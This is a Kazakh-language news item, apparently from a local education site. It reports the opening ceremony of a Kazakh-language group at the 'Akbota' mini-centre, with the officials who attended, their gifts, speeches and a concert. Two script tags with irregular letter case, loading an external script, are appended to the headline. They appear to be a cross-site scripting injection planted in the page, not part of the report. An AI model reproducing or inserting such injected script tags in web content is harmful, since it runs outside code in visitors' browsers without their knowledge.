Мемлекеттік тілде оқытатын топтың салтанатты ашылуы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

03.03.2024

2024 жылдың 1 наурызында Алғыс айту күні "Ақбота" шағын орталығында мемлекеттік тілде оқытатын топтың салтанатты ашылуы өтті. Аталған іс-шараға "Ақмола облысы білім басқармасының Атбасар ауданы бойынша білім бөлімі" ММ басшысы Н.Г. Наймушина, Сепе ауылдық округінің әкімі М.Ж. Тасимов, білім бөлімінің әдіскері И. В. Семенча, ауыл ардагерлері кеңесінің төрағасы Б. Ж. Қозбағаров, жергілікті қоғамдастық мүшелері Н. К. Джусупов, В. А. Макаров қатысты, педагогикалық еңбек ардагерлері И. И. Бублик, К. М. Жұмабаева, сондай-ақ ауыл ақсақалдары. Салтанатты жағдайда таспа кесіліп, құттықтау сөздерімен Наталья Георгиевна сөз сөйлеп, балаларға арналған білім беру ойындары түрінде сыйлықтар табыс етті. Ауыл әкімі Мейрам Жағыпарұлы барлық қатысушыларды құттықтап, балаларға арналған білім беру, үстел ойындары түрінде сыйлықтар табыс етті. Ауылдың зейнеткері Мейрамова Р. Ш. қоштасу сөздерін айтып, батасын берді. Барлық қонақтар осындай айтулы іс-шарамен құттықтады, мектеп оқушылары музыкалық нөмірлермен өнер көрсетті, көрме, фотосессия рәсімделді, концерт соңында шай кеші ұйымдастырылды.

Просмотров: 498


Пікір қосу



Деректерді қолтаңбаға қосу